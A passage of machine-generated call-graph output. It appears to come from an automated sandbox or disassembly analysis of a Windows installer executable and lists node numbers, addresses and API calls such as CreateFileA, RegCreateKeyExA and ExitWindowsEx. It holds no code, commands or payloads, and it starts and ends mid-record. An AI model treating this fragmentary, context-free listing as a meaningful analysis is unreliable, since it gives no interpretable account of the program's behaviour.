4041->4051 4042 10001bab lstrcpyA 4046 10001bb5 lstrcpyA 4042->4046 4043 10001bc9 GlobalFree 4043->4058 4045->4051 4126 10001224 4045->4126 4046->4058 4047 100020b3 4050 100020c0 lstrlenA 4047->4050 4047->4051 4049 10001f7a 4049->4051 4055 10001fbe lstrcpyA 4049->4055 4131 100015a4 GetProcAddress 4050->4131 4051->3978 4052 10002074 4052->4047 4062 1000209d GetProcAddress 4052->4062 4055->4051 4056 10001c07 4056->4058 4124 10001534 GlobalSize GlobalAlloc 4056->4124 4057 10001e75 GlobalFree 4057->4058 4058->4035 4058->4038 4058->4042 4058->4043 4058->4046 4058->4049 4058->4051 4058->4056 4058->4057 4061 10001224 2 API calls 4058->4061 4129 10001215 GlobalAlloc 4058->4129 4059 100020d9 4059->4051 4061->4058 4062->4047 4064 10002212 4063->4064 4066 10002349 GlobalFree 4064->4066 4068 100022b9 GlobalAlloc MultiByteToWideChar 4064->4068 4069 1000230a lstrlenA 4064->4069 4070 10001224 GlobalAlloc lstrcpynA 4064->4070 4133 100012ad 4064->4133 4066->4064 4067 10001712 4066->4067 4067->3988 4067->3989 4067->4004 4071 100022e3 GlobalAlloc CLSIDFromString GlobalFree 4068->4071 4073 10002303 4068->4073 4069->4066 4069->4073 4070->4064 4071->4066 4073->4066 4137 10002521 4073->4137 4076 100027fe 4074->4076 4075 100028a3 CreateFileA 4077 100028c1 4075->4077 4076->4075 4078 100029b2 GetLastError 4077->4078 4079 100029bd 4077->4079 4078->4079 4079->4004 4081 100021c0 4080->4081 4083 1000170b 4080->4083 4082 100021d2 GlobalAlloc 4081->4082 4081->4083 4082->4081 4083->3981 4088 100025a9 4084->4088 4085 100025fa GlobalAlloc 4089 1000261c 4085->4089 4086 1000260d 4087 10002612 GlobalSize 4086->4087 4086->4089 4087->4089 4088->4085 4088->4086 4089->4007 4091 10002ab2 4090->4091 4092 10002af2 GlobalFree 4091->4092 4140 10001215 GlobalAlloc 4093->4140 4095 10002473 WideCharToMultiByte 4098 100023e6 4095->4098 4096 1000243a lstrcpynA 4096->4098 4097 1000244b StringFromGUID2 WideCharToMultiByte 4097->4098 4098->4095 4098->4096 4098->4097 4099 10002494 wsprintfA 4098->4099 4100 100024b8 GlobalFree 4098->4100 4101 100024f2 GlobalFree 4098->4101 4102 10001266 2 API calls 4098->4102 4141 100012d1 4098->4141 4099->4098 4100->4098 4101->3996 4102->4098 4145 10001215 GlobalAlloc 4104->4145 4106 1000155f 4107 1000156c lstrcpyA 4106->4107 4109 10001586 4106->4109 4110 100015a0 4107->4110 4109->4110 4111 1000158b wsprintfA 4109->4111 4112 10001266 4110->4112 4111->4110 4113 100012a8 GlobalFree 4112->4113 4114 1000126f GlobalAlloc lstrcpynA 4112->4114 4113->4005 4114->4113 4116 100017c5 4115->4116 4117 100023ae 4115->4117 4116->4014 4116->4015 4117->4116 4118 100023c7 GlobalFree 4117->4118 4118->4117 4120 10001266 2 API calls 4119->4120 4121 10001503 4120->4121 4121->4008 4122->4033 4123->4058 4125 10001552 4124->4125 4125->4056 4132 10001215 GlobalAlloc 4126->4132 4128 10001233 lstrcpynA 4128->4051 4129->4058 4130->4052 4131->4059 4132->4128 4134 100012b4 4133->4134 4135 10001224 2 API calls 4134->4135 4136 100012cf 4135->4136 4136->4064 4138 10002585 4137->4138 4139 1000252f VirtualAlloc 4137->4139 4138->4073 4139->4138 4140->4098 4142 100012f9 4141->4142 4143 100012da 4141->4143 4142->4098 4143->4142 4144 100012e0 lstrcpyA 4143->4144 4144->4142 4145->4106 5076 40286d SendMessageA 5077 402892 5076->5077 5078 402887 InvalidateRect 5076->5078 5078->5077 5079 4014f0 SetForegroundWindow 5080 402892 5079->5080 5081 401af0 5082 4029fd 18 API calls 5081->5082 5083 401af7 5082->5083 5084 4029e0 18 API calls 5083->5084 5085 401b00 wsprintfA 5084->5085 5086 402892 5085->5086 5087 4019f1 5088 4029fd 18 API calls 5087->5088 5089 4019fa ExpandEnvironmentStringsA 5088->5089 5090 401a0e 5089->5090 5092 401a21 5089->5092 5091 401a13 lstrcmpA 5090->5091 5090->5092 5091->5092 5093 100015b3 5094 100014bb GlobalFree 5093->5094 5096 100015cb 5094->5096 5095 10001611 GlobalFree 5096->5095 5097 100015e6 5096->5097 5098 100015fd VirtualFree 5096->5098 5097->5095 5098->5095 5106 401c78 5107 4029e0 18 API calls 5106->5107 5108 401c7e IsWindow 5107->5108 5109 4019e1 5108->5109 5110 40477a 5111 4047a6 5110->5111 5112 40478a 5110->5112 5114 4047d9 5111->5114 5115 4047ac SHGetPathFromIDListA 5111->5115 5121 40552e GetDlgItemTextA 5112->5121 5116 4047bc 5115->5116 5120 4047c3 SendMessageA 5115->5120 5118 40140b 2 API calls 5116->5118 5117 404797 SendMessageA 5117->5111 5118->5120 5120->5114 5121->5117 5122 1000103d 5123 1000101b 5 API calls 5122->5123 5124 10001056 5123->5124 5125 4014fe 5126 401506 5125->5126 5128 401519 5125->5128 5127 4029e0 18 API calls 5126->5127 5127->5128 4868 40227f 4869 4029fd 18 API calls 4868->4869 4870 402290 4869->4870 4871 4029fd 18 API calls 4870->4871 4872 402299 4871->4872 4873 4029fd 18 API calls 4872->4873 4874 4022a3 GetPrivateProfileStringA 4873->4874 5129 401000 5130 401037 BeginPaint GetClientRect 5129->5130 5131 40100c DefWindowProcA 5129->5131 5133 4010f3 5130->5133 5134 401179 5131->5134 5135 401073 CreateBrushIndirect FillRect DeleteObject 5133->5135 5136 4010fc 5133->5136 5135->5133 5137 401102 CreateFontIndirectA 5136->5137 5138 401167 EndPaint 5136->5138 5137->5138 5139 401112 6 API calls 5137->5139 5138->5134 5139->5138 5140 404100 lstrcpynA lstrlenA 5141 402602 5142 402892 5141->5142 5143 402609 5141->5143 5144 40260f FindClose 5143->5144 5144->5142 5152 402683 5153 4029fd 18 API calls 5152->5153 5154 402691 5153->5154 5155 4026a7 5154->5155 5157 4029fd 18 API calls 5154->5157 5156 4059a2 2 API calls 5155->5156 5158 4026ad 5156->5158 5157->5155 5178 4059c7 GetFileAttributesA CreateFileA 5158->5178 5160 4026ba 5161 402763 5160->5161 5162 4026c6 GlobalAlloc 5160->5162 5165 40276b DeleteFileA 5161->5165 5166 40277e 5161->5166 5163 40275a CloseHandle 5162->5163 5164 4026df 5162->5164 5163->5161 5179 4031cc SetFilePointer 5164->5179 5165->5166 5168 4026e5 5169 4031b6 ReadFile 5168->5169 5170 4026ee GlobalAlloc 5169->5170 5171 402732 WriteFile GlobalFree 5170->5171 5172 4026fe 5170->5172 5173 402f1f 46 API calls 5171->5173 5174 402f1f 46 API calls 5172->5174 5175 402757 5173->5175 5177 40270b 5174->5177 5175->5163 5176 402729 GlobalFree 5176->5171 5177->5176 5178->5160 5179->5168 5180 401705 5181 4029fd 18 API calls 5180->5181 5182 40170c SearchPathA 5181->5182 5183 4027bd 5182->5183 5184 401727 5182->5184 5184->5183 5186 405d36 lstrcpynA 5184->5186 5186->5183 5187 100029c7 5188 100029df 5187->5188 5189 10001534 2 API calls 5188->5189 5190 100029fa 5189->5190 4149 40218a 4150 4029fd 18 API calls 4149->4150 4151 402190 4150->4151 4152 4029fd 18 API calls 4151->4152 4153 402199 4152->4153 4154 4029fd 18 API calls 4153->4154 4155 4021a2 4154->4155 4164 40603a FindFirstFileA 4155->4164 4158 4021bc lstrlenA lstrlenA 4160 40501f 25 API calls 4158->4160 4159 40501f 25 API calls 4163 4021b7 4159->4163 4161 4021f8 SHFileOperationA 4160->4161 4162 4021af 4161->4162 4161->4163 4162->4159 4162->4163 4165 406050 FindClose 4164->4165 4166 4021ab 4164->4166 4165->4166 4166->4158 4166->4162 5191 40280a 5192 4029e0 18 API calls 5191->5192 5193 402810 5192->5193 5194 402841 5193->5194 5195 402663 5193->5195 5197 40281e 5193->5197 5194->5195 5196 405d58 18 API calls 5194->5196 5196->5195 5197->5195 5199 405c94 wsprintfA 5197->5199 5199->5195 5200 40220c 5201 402213 5200->5201 5205 402226 5200->5205 5202 405d58 18 API calls 5201->5202 5203 402220 5202->5203 5204 40554a MessageBoxIndirectA 5203->5204 5204->5205 5206 401490 5207 40501f 25 API calls 5206->5207 5208 401497 5207->5208 5209 406310 5211 406194 5209->5211 5210 406aff 5211->5210 5212 406215 GlobalFree 5211->5212 5213 40621e GlobalAlloc 5211->5213 5214 406295 GlobalAlloc 5211->5214 5215 40628c GlobalFree 5211->5215 5212->5213 5213->5210 5213->5211 5214->5210 5214->5211 5215->5214 5216 401b11 5217 401b62 5216->5217 5218 401b1e 5216->5218 5219 401b66 5217->5219 5220 401b8b GlobalAlloc 5217->5220 5221 401ba6 5218->5221 5226 401b35 5218->5226 5229 402226 5219->5229 5237 405d36 lstrcpynA 5219->5237 5222 405d58 18 API calls 5220->5222 5223 405d58 18 API calls 5221->5223 5221->5229 5222->5221 5225 402220 5223->5225 5230 40554a MessageBoxIndirectA 5225->5230 5235 405d36 lstrcpynA 5226->5235 5228 401b78 GlobalFree 5228->5229 5230->5229 5231 401b44 5236 405d36 lstrcpynA 5231->5236 5233 401b53 5238 405d36 lstrcpynA 5233->5238 5235->5231 5236->5233 5237->5228 5238->5229 5239 404f93 5240 404fa3 5239->5240 5241 404fb7 5239->5241 5242 404fa9 5240->5242 5251 405000 5240->5251 5243 404fbf IsWindowVisible 5241->5243 5247 404fd6 5241->5247 5245 404038 SendMessageA 5242->5245 5246 404fcc 5243->5246 5243->5251 5244 405005 CallWindowProcA 5248 404fb3 5244->5248 5245->5248 5252 4048ea SendMessageA 5246->5252 5247->5244 5257 40496a 5247->5257 5251->5244 5253 404949 SendMessageA 5252->5253 5254 40490d GetMessagePos ScreenToClient SendMessageA 5252->5254 5255 404941 5253->5255 5254->5255 5256 404946 5254->5256 5255->5247 5256->5253 5266 405d36 lstrcpynA 5257->5266 5259 40497d 5267 405c94 wsprintfA 5259->5267 5261 404987 5262 40140b 2 API calls 5261->5262 5263 404990 5262->5263 5268 405d36 lstrcpynA 5263->5268 5265 404997 5265->5251 5266->5259 5267->5261 5268->5265 5269 401c95 5270 4029e0 18 API calls 5269->5270 5271 401c9c 5270->5271 5272 4029e0 18 API calls 5271->5272 5273 401ca4 GetDlgItem 5272->5273 5274 4024cb 5273->5274 5275 401595 5276 4029fd 18 API calls 5275->5276 5277 40159c SetFileAttributesA 5276->5277 5278 4015ae 5277->5278 4239 403217 #17 SetErrorMode OleInitialize 4240 406061 3 API calls 4239->4240 4241 40325c SHGetFileInfoA 4240->4241 4314 405d36 lstrcpynA 4241->4314 4243 403287 GetCommandLineA 4315 405d36 lstrcpynA 4243->4315 4245 403299 GetModuleHandleA 4246 4032b0 4245->4246 4247 4057f1 CharNextA 4246->4247 4248 4032c4 CharNextA 4247->4248 4254 4032d4 4248->4254 4249 40339e 4250 4033b1 GetTempPathA 4249->4250 4316 4031e3 4250->4316 4252 4033c9 4255 403423 DeleteFileA 4252->4255 4256 4033cd GetWindowsDirectoryA lstrcatA 4252->4256 4253 4057f1 CharNextA 4253->4254 4254->4249 4254->4253 4259 4033a0 4254->4259 4324 402c79 GetTickCount GetModuleFileNameA 4255->4324 4258 4031e3 11 API calls 4256->4258 4261 4033e9 4258->4261 4408 405d36 lstrcpynA 4259->4408 4260 403437 4268 4057f1 CharNextA 4260->4268 4297 4034bd 4260->4297 4308 4034cd 4260->4308 4261->4255 4263 4033ed GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4261->4263 4264 4031e3 11 API calls 4263->4264 4266 40341b 4264->4266 4266->4255 4266->4308 4270 403452 4268->4270 4277 403498 4270->4277 4278 4034fc lstrcatA lstrcmpiA 4270->4278 4271 4034e6 4434 40554a 4271->4434 4272 4035da 4273 40367d ExitProcess 4272->4273 4276 406061 3 API calls 4272->4276 4280 4035ed 4276->4280 4409 4058b4 4277->4409 4282 403518 CreateDirectoryA SetCurrentDirectoryA 4278->4282 4278->4308 4285 406061 3 API calls 4280->4285 4283 40353a 4282->4283 4284 40352f 4282->4284 4439 405d36 lstrcpynA 4283->4439 4438 405d36 lstrcpynA 4284->4438 4289 4035f6 4285->4289 4291 406061 3 API calls 4289->4291 4293 4035ff 4291->4293 4292 4034b2 4424 405d36 lstrcpynA 4292->4424 4296 40361d 4293->4296 4302 40360d GetCurrentProcess 4293->4302 4295 405d58 18 API calls 4298 403579 DeleteFileA 4295->4298 4299 406061 3 API calls 4296->4299 4354 403787 4297->4354 4300 403586 CopyFileA 4298->4300 4311 403548 4298->4311 4301 403654 4299->4301 4300->4311 4304 403669 ExitWindowsEx 4301->4304 4307 403676 4301->4307 4302->4296 4303 4035ce 4305 405bea 40 API calls 4303->4305 4304->4273 4304->4307 4305->4308 4448 40140b 4307->4448 4425 403695 4308->4425 4310 405d58 18 API calls 4310->4311 4311->4295 4311->4303 4311->4310 4313 4035ba CloseHandle 4311->4313 4440 405bea 4311->4440 4445 4054e5 CreateProcessA 4311->4445 4313->4311 4314->4243 4315->4245 4317 405fa1 5 API calls 4316->4317 4319 4031ef 4317->4319 4318 4031f9 4318->4252 4319->4318 4451 4057c6 lstrlenA CharPrevA 4319->4451 4322 4059f6 2 API calls 4323 403215 4322->4323 4323->4252 4454 4059c7 GetFileAttributesA CreateFileA 4324->4454 4326 402cbc 4353 402cc9 4326->4353 4455 405d36 lstrcpynA 4326->4455 4328 402cdf 4456 40580d lstrlenA 4328->4456 4332 402cf0 GetFileSize 4333 402df1 4332->4333 4335 402d07 4332->4335 4461 402bda 4333->4461 4335->4333 4339 402e8c 4335->4339 4346 402bda 33 API calls 4335->4346 4335->4353 4492 4031b6 4335->4492 4338 402e34 GlobalAlloc 4343 402e4b 4338->4343 4340 402bda 33 API calls 4339->4340 4340->4353 4342 402e15 4345 4031b6 ReadFile 4342->4345 4344 4059f6 2 API calls 4343->4344 4347 402e5c CreateFileA 4344->4347 4348 402e20 4345->4348 4346->4335 4349 402e96 4347->4349 4347->4353 4348->4338 4348->4353 4476 4031cc SetFilePointer 4349->4476 4351 402ea4 4477 402f1f 4351->4477 4353->4260 4355 406061 3 API calls 4354->4355 4356 40379b 4355->4356 4357 4037a1 4356->4357 4358 4037b3 4356->4358 4542 405c94 wsprintfA 4357->4542 4359 405c1d 3 API calls 4358->4359 4360 4037de 4359->4360 4361 4037fc lstrcatA 4360->4361 4363 405c1d 3 API calls 4360->4363 4364 4037b1 4361->4364 4363->4361 4526 403a4c 4364->4526 4367 4058b4 18 API calls 4369 40382e 4367->4369 4368 4038b7 4370 4058b4 18 API calls 4368->4370 4369->4368 4371 405c1d 3 API calls 4369->4371 4372 4038bd 4370->4372 4374 40385a 4371->4374 4373 4038cd LoadImageA 4372->4373 4375 405d58 18 API calls 4372->4375 4376 403973 4373->4376 4377 4038f4 RegisterClassA 4373->4377 4374->4368 4378 403876 lstrlenA 4374->4378 4381 4057f1 CharNextA 4374->4381 4375->4373 4380 40140b 2 API calls 4376->4380 4379 40392a SystemParametersInfoA CreateWindowExA 4377->4379 4407 40397d 4377->4407 4382 403884 lstrcmpiA 4378->4382 4383 4038aa 4378->4383 4379->4376 4384 403979 4380->4384 4385 403874 4381->4385 4382->4383 4386 403894 GetFileAttributesA 4382->4386 4387 4057c6 3 API calls 4383->4387 4389 403a4c 19 API calls 4384->4389 4384->4407 4385->4378 4388 4038a0 4386->4388 4390 4038b0 4387->4390 4388->4383 4391 40580d 2 API calls 4388->4391 4392 40398a 4389->4392 4543 405d36 lstrcpynA 4390->4543 4391->4383 4394 403996 ShowWindow LoadLibraryA 4392->4394 4395 403a19 4392->4395 4397 4039b5 LoadLibraryA 4394->4397 4398 4039bc GetClassInfoA 4394->4398 4535 4050f1 OleInitialize 4395->4535 4397->4398 4400 4039d0 GetClassInfoA RegisterClassA 4398->4400 4401 4039e6 DialogBoxParamA 4398->4401 4399 403a1f 4403 403a23 4399->4403 4404 403a3b 4399->4404 4400->4401 4402 40140b 2 API calls 4401->4402 4402->4407 4406 40140b 2 API calls 4403->4406 4403->4407 4405 40140b 2 API calls 4404->4405 4405->4407 4406->4407 4407->4308 4408->4250 4552 405d36 lstrcpynA 4409->4552 4411 4058c5 4412 40585f 4 API calls 4411->4412 4413 4058cb 4412->4413 4414 4034a3 4413->4414 4415 405fa1 5 API calls 4413->4415 4414->4308 4423 405d36 lstrcpynA 4414->4423 4421 4058db 4415->4421 4416 405906 lstrlenA 4417 405911 4416->4417 4416->4421 4419 4057c6 3 API calls 4417->4419 4418 40603a 2 API calls 4418->4421 4420 405916 GetFileAttributesA 4419->4420 4420->4414 4421->4414 4421->4416 4421->4418 4422 40580d 2 API calls 4421->4422 4422->4416 4423->4292 4424->4297 4426 4036b0 4425->4426 4427 4036a6 CloseHandle 4425->4427 4428 4036c4 4426->4428 4429 4036ba CloseHandle 4426->4429 4427->4426 4553 4036f2 4428->4553 4429->4428 4437 40555f 4434->4437 4435 4034f4 ExitProcess 4436 405573 MessageBoxIndirectA 4436->4435 4437->4435 4437->4436 4438->4283 4439->4311 4441 406061 3 API calls 4440->4441 4442 405bf1 4441->4442 4444 405c12 4442->4444 4610 405a6e lstrcpyA 4442->4610 4444->4311 4446 405524 4445->4446 4447 405518 CloseHandle 4445->4447 4446->4311 4447->4446 4449 401389 2 API calls 4448->4449 4450 401420 4449->4450 4450->4273 4452 4057e0 lstrcatA 4451->4452 4453 403201 CreateDirectoryA 4451->4453 4452->4453 4453->4322 4454->4326 4455->4328 4457 40581a 4456->4457 4458 402ce5 4457->4458 4459 40581f CharPrevA 4457->4459 4460 405d36 lstrcpynA 4458->4460 4459->4457 4459->4458 4460->4332 4462 402c00 4461->4462 4463 402be8 4461->4463 4465 402c10 GetTickCount 4462->4465 4466 402c08 4462->4466 4464 402bf1 DestroyWindow 4463->4464 4471 402bf8 4463->4471 4464->4471 4468 402c1e 4465->4468 4465->4471 4496 40609a 4466->4496 4469 402c53 CreateDialogParamA ShowWindow 4468->4469 4470 402c26 4468->4470 4469->4471 4470->4471 4500 402bbe 4470->4500 4471->4338 4471->4353 4495 4031cc SetFilePointer 4471->4495 4473 402c34 wsprintfA 4474 40501f 25 API calls 4473->4474 4475 402c51 4474->4475 4475->4471 4476->4351 4478 402f4b 4477->4478 4479 402f2f SetFilePointer 4477->4479 4503 40303a GetTickCount 4478->4503 4479->4478 4484 40303a 43 API calls 4485 402f82 4484->4485 4486 402ffc ReadFile 4485->4486 4488 402ff6 4485->4488 4491 402f92 4485->4491 4486->4488 4488->4353 4489 405a3f ReadFile 4489->4491 4490 402fc5 WriteFile 4490->4488 4490->4491 4491->4488 4491->4489 4491->4490 4493 405a3f ReadFile 4492->4493 4494 4031c9 4493->4494 4494->4335 4495->4342 4497 4060b7 PeekMessageA 4496->4497 4498 4060c7 4497->4498 4499 4060ad DispatchMessageA 4497->4499 4498->4471 4499->4497 4501 402bcd 4500->4501 4502 402bcf MulDiv 4500->4502 4501->4502 4502->4473 4504 4031a4 4503->4504 4505 403069 4503->4505 4506 402bda 33 API calls 4504->4506 4518 4031cc SetFilePointer 4505->4518 4513 402f52 4506->4513 4508 403074 SetFilePointer 4512 403099 4508->4512 4509 4031b6 ReadFile 4509->4512 4511 402bda 33 API calls 4511->4512 4512->4509 4512->4511 4512->4513 4514 40312e WriteFile 4512->4514 4515 403185 SetFilePointer 4512->4515 4519 406161 4512->4519 4513->4488 4516 405a3f ReadFile 4513->4516 4514->4512 4514->4513 4515->4504 4517 402f6b 4516->4517 4517->4484 4517->4488 4518->4508 4520 406186 4519->4520 4523 40618e 4519->4523 4520->4512 4521 406215 GlobalFree 4522 40621e GlobalAlloc 4521->4522 4522->4520 4522->4523 4523->4520 4523->4521 4523->4522 4523->4523 4524 406295 GlobalAlloc 4523->4524 4525 40628c GlobalFree 4523->4525 4524->4520 4524->4523 4525->4524 4527 403a60 4526->4527 4544 405c94 wsprintfA 4527->4544 4529 403ad1 4530 405d58 18 API calls 4529->4530 4531 403add SetWindowTextA 4530->4531 4532 40380c 4531->4532 4533 403af9 4531->4533 4532->4367 4533->4532 4534 405d58 18 API calls 4533->4534 4534->4533 4545 404038 4535->4545 4537 40513b 4538 404038 SendMessageA 4537->4538 4540 40514d OleUninitialize 4538->4540 4539 405114 4539->4537 4548 401389 4539->4548 4540->4399 4542->4364 4543->4368 4544->4529 4546 404050 4545->4546 4547 404041 SendMessageA 4545->4547 4546->4539 4547->4546 4550 401390 4548->4550 4549 4013fe 4549->4539 4550->4549 4551 4013cb MulDiv SendMessageA 4550->4551 4551->4550 4552->4411 4554 403700 4553->4554 4555 4036c9 4554->4555 4556 403705 FreeLibrary GlobalFree 4554->4556 4557 4055f6 4555->4557 4556->4555 4556->4556 4558 4058b4 18 API calls 4557->4558 4559 405616 4558->4559 4560 405635 4559->4560 4561 40561e DeleteFileA 4559->4561 4563 405763 4560->4563 4597 405d36 lstrcpynA 4560->4597 4562 4034d6 OleUninitialize 4561->4562 4562->4271 4562->4272 4563->4562 4568 40603a 2 API calls 4563->4568 4565 40565b 4566 405661 lstrcatA 4565->4566 4567 40566e 4565->4567 4569 405674 4566->4569 4570 40580d 2 API calls 4567->4570 4571 405787 4568->4571 4572 405682 lstrcatA 4569->4572 4574 40568d lstrlenA FindFirstFileA 4569->4574 4570->4569 4571->4562 4573 40578b 4571->4573 4572->4574 4575 4057c6 3 API calls 4573->4575 4574->4563 4579 4056b1 4574->4579 4576 405791 4575->4576 4578 4055ae 5 API calls 4576->4578 4577 4057f1 CharNextA 4577->4579 4580 40579d 4578->4580 4579->4577 4584 405742 FindNextFileA 4579->4584 4593 405703 4579->4593 4598 405d36 lstrcpynA 4579->4598 4581 4057a1 4580->4581 4582 4057b7 4580->4582 4581->4562 4587 40501f 25 API calls 4581->4587 4583 40501f 25 API calls 4582->4583 4583->4562 4584->4579 4586 40575a FindClose 4584->4586 4586->4563 4588 4057ae 4587->4588 4589 405bea 40 API calls 4588->4589 4592 4057b5 4589->4592 4591 4055f6 64 API calls 4591->4593 4592->4562 4593->4584 4593->4591 4594 40501f 25 API calls 4593->4594 4595 40501f 25 API calls 4593->4595 4596 405bea 40 API calls 4593->4596 4599 4055ae 4593->4599 4594->4584 4595->4593 4596->4593 4597->4565 4598->4579 4607 4059a2 GetFileAttributesA 4599->4607 4602 4055db 4602->4593 4603 4055d1 DeleteFileA 4605 4055d7 4603->4605 4604 4055c9 RemoveDirectoryA 4604->4605 4605->4602 4606 4055e7 SetFileAttributesA 4605->4606 4606->4602 4608 4055ba 4607->4608 4609 4059b4 SetFileAttributesA 4607->4609 4608->4602 4608->4603 4608->4604 4609->4608 4611 405a97 4610->4611 4612 405abd GetShortPathNameA 4610->4612 4635 4059c7 GetFileAttributesA CreateFileA 4611->4635 4614 405ad2 4612->4614 4615 405be4 4612->4615 4614->4615 4617 405ada wsprintfA 4614->4617 4615->4444 4616 405aa1 CloseHandle GetShortPathNameA 4616->4615 4618 405ab5 4616->4618 4619 405d58 18 API calls 4617->4619 4618->4612 4618->4615 4620 405b02 4619->4620 4636 4059c7 GetFileAttributesA CreateFileA 4620->4636 4622 405b0f 4622->4615 4623 405b1e GetFileSize GlobalAlloc 4622->4623 4624 405b40 4623->4624 4625 405bdd CloseHandle 4623->4625 4626 405a3f ReadFile 4624->4626 4625->4615 4627 405b48 4626->4627 4627->4625 4637 40592c lstrlenA 4627->4637 4630 405b73 4632 40592c 4 API calls 4630->4632 4631 405b5f lstrcpyA 4633 405b81 4631->4633 4632->4633 4634 405bb8 SetFilePointer WriteFile GlobalFree 4633->4634 4634->4625 4635->4616 4636->4622 4638 40596d lstrlenA 4637->4638 4639 405975 4638->4639 4640 405946 lstrcmpiA 4638->4640 4639->4630 4639->4631 4640->4639 4641 405964 CharNextA 4640->4641 4641->4638 5279 10001058 5281 10001074 5279->5281 5280 100010dc 5281->5280 5282 100014bb GlobalFree 5281->5282 5283 10001091 5281->5283 5282->5283 5284 100014bb GlobalFree 5283->5284 5285 100010a1 5284->5285 5286 100010b1 5285->5286 5287 100010a8 GlobalSize 5285->5287 5288 100010b5 GlobalAlloc 5286->5288 5289 100010c6 5286->5289 5287->5286 5290 100014e2 3 API calls 5288->5290 5291 100010d1 GlobalFree 5289->5291 5290->5289 5291->5280 4682 403b19 4683 403b31 4682->4683 4684 403c6c 4682->4684 4683->4684 4685 403b3d 4683->4685 4686 403cbd 4684->4686 4687 403c7d GetDlgItem GetDlgItem 4684->4687 4688 403b48 SetWindowPos 4685->4688 4689 403b5b 4685->4689 4691 403d17 4686->4691 4699 401389 2 API calls 4686->4699 4690 403fec 19 API calls 4687->4690 4688->4689 4693 403b60 ShowWindow 4689->4693 4694 403b78 4689->4694 4695 403ca7 SetClassLongA 4690->4695 4692 404038 SendMessageA 4691->4692 4712 403c67 4691->4712 4722 403d29 4692->4722 4693->4694 4696 403b80 DestroyWindow 4694->4696 4697 403b9a 4694->4697 4698 40140b 2 API calls 4695->4698 4751 403f75 4696->4751 4700 403bb0 4697->4700 4701 403b9f SetWindowLongA 4697->4701 4698->4686 4702 403cef 4699->4702 4706 403c59 4700->4706 4707 403bbc GetDlgItem 4700->4707 4701->4712 4702->4691 4703 403cf3 SendMessageA 4702->4703 4703->4712 4704 40140b 2 API calls 4704->4722 4705 403f77 DestroyWindow EndDialog 4705->4751 4761 404053 4706->4761 4710 403bec 4707->4710 4711 403bcf SendMessageA IsWindowEnabled 4707->4711 4709 403fa6 ShowWindow 4709->4712 4714 403bf9 4710->4714 4715 403c40 SendMessageA 4710->4715 4716 403c0c 4710->4716 4725 403bf1 4710->4725 4711->4710 4711->4712 4713 405d58 18 API calls 4713->4722 4714->4715 4714->4725 4715->4706 4719 403c14 4716->4719 4720 403c29 4716->4720 4718 403fec 19 API calls 4718->4722 4723 40140b 2 API calls 4719->4723 4724 40140b 2 API calls 4720->4724 4721 403c27 4721->4706 4722->4704 4722->4705 4722->4712 4722->4713 4722->4718 4742 403eb7 DestroyWindow 4722->4742 4752 403fec 4722->4752 4723->4725 4726 403c30 4724->4726 4758 403fc5 4725->4758 4726->4706 4726->4725 4728 403da4 GetDlgItem 4729 403dc1 ShowWindow KiUserCallbackDispatcher 4728->4729 4730 403db9 4728->4730 4755 40400e KiUserCallbackDispatcher 4729->4755 4730->4729 4732 403deb EnableWindow 4736 403dff 4732->4736 4733 403e04 GetSystemMenu EnableMenuItem SendMessageA 4734 403e34 SendMessageA 4733->4734 4733->4736 4734->4736 4736->4733 4756 404021 SendMessageA 4736->4756 4757 405d36 lstrcpynA 4736->4757 4738 403e62 lstrlenA 4739 405d58 18 API calls 4738->4739 4740 403e73 SetWindowTextA 4739->4740 4741 401389 2 API calls 4740->4741 4741->4722 4743 403ed1 CreateDialogParamA 4742->4743 4742->4751 4744 403f04 4743->4744 4743->4751 4745 403fec 19 API calls 4744->4745 4746 403f0f GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4745->4746 4747 401389 2 API calls 4746->4747 4748 403f55 4747->4748 4748->4712 4749 403f5d ShowWindow 4748->4749 4750 404038 SendMessageA 4749->4750 4750->4751 4751->4709 4751->4712 4753 405d58 18 API calls 4752->4753 4754 403ff7 SetDlgItemTextA 4753->4754 4754->4728 4755->4732 4756->4736 4757->4738 4759 403fd2 SendMessageA 4758->4759 4760 403fcc 4758->4760 4759->4721 4760->4759 4762 40406b GetWindowLongA 4761->4762 4772 4040f4 4761->4772 4763 40407c 4762->4763 4762->4772 4764 40408b GetSysColor 4763->4764 4765 40408e 4763->4765 4764->4765 4766 404094 SetTextColor 4765->4766 4767 40409e SetBkMode 4765->4767 4766->4767 4768 4040b6 GetSysColor 4767->4768 4769 4040bc 4767->4769 4768->4769 4770 4040c3 SetBkColor 4769->4770 4771 4040cd 4769->4771 4770->4771 4771->4772 4773 4040e0 DeleteObject 4771->4773 4774 4040e7 CreateBrushIndirect 4771->4774 4772->4712 4773->4774 4774->4772 5299 402519 5300 4029e0 18 API calls 5299->5300 5304 402523 5300->5304 5301 40258d 5302 405a3f ReadFile 5302->5304 5303 40258f 5308 405c94 wsprintfA 5303->5308 5304->5301 5304->5302 5304->5303 5305 40259f 5304->5305 5305->5301 5307 4025b5 SetFilePointer 5305->5307 5307->5301 5308->5301 4801 40231c 4802 402322 4801->4802 4803 4029fd 18 API calls 4802->4803 4804 402334 4803->4804 4805 4029fd 18 API calls 4804->4805 4806 40233e RegCreateKeyExA 4805->4806 4807 402663 4806->4807 4808 402368 4806->4808 4809 402380 4808->4809 4810 4029fd 18 API calls 4808->4810 4811 40238c 4809->4811 4814 4029e0 18 API calls 4809->4814 4813 402379 lstrlenA 4810->4813 4812 4023a7 RegSetValueExA 4811->4812 4815 402f1f 46 API calls 4811->4815 4816 4023bd RegCloseKey 4812->4816 4813->4809 4814->4811 4815->4812 4816->4807 5309 40261c 5310 402637 5309->5310 5311 40261f 5309->5311 5313 4027bd 5310->5313 5315 405d36 lstrcpynA 5310->5315 5312 40262c FindNextFileA 5311->5312 5312->5310 5315->5313 5316 40499c GetDlgItem GetDlgItem 5317 4049ee 7 API calls 5316->5317 5359 404c06 5316->5359 5318 404a91 DeleteObject 5317->5318 5319 404a84 SendMessageA 5317->5319 5320 404a9a 5318->5320 5319->5318 5322 404ad1 5320->5322 5323 405d58 18 API calls 5320->5323 5321 404cea 5325 404d96 5321->5325 5330 404bf9 5321->5330 5335 404d43 SendMessageA 5321->5335 5324 403fec 19 API calls 5322->5324 5326 404ab3 SendMessageA SendMessageA 5323->5326 5329 404ae5 5324->5329 5327 404da0 SendMessageA 5325->5327 5328 404da8 5325->5328 5326->5320 5327->5328 5337 404dc1 5328->5337 5338 404dba ImageList_Destroy 5328->5338 5346 404dd1 5328->5346 5334 403fec 19 API calls 5329->5334 5331 404053 8 API calls 5330->5331 5336 404f8c 5331->5336 5332 